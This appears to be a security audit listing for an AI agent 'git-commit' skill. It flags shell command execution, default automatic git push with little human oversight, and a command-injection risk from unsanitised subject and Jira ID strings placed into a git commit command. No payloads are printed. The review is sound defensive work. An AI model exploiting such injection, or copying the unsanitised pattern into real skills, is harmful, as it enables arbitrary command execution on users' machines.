The Agent Skills Directory

[COMMAND_EXECUTION]: The skill executes multiple shell commands including git status, git add ., git commit, and git push to automate version control tasks. These commands are executed directly in the user's shell environment.
[DATA_EXFILTRATION]: In its default 'Automatic Mode', the skill performs a git push to the remote repository. While this is standard functionality for a git tool, the default-on automation reduces human oversight regarding which files and data are being sent to external servers.
[PROMPT_INJECTION]: The skill constructs shell commands by interpolating external strings (type, scope, ID, subject) into a git commit command. Because the skill does not specify any sanitization for shell metacharacters (such as backticks, semicolons, or pipe symbols), it is vulnerable to command injection if the input data—which can come from users or automated workflows—is maliciously crafted.
Ingestion points: Inputs such as subject and jira_id are ingested from user prompts or the jira-fix-workflow (SKILL.md).
Boundary markers: None identified in the prompt interpolation logic.
Capability inventory: The skill uses git shell commands via git add ., git commit -m, and git push (SKILL.md).
Sanitization: No sanitization or escaping of shell metacharacters is described in the instruction set.

git-commit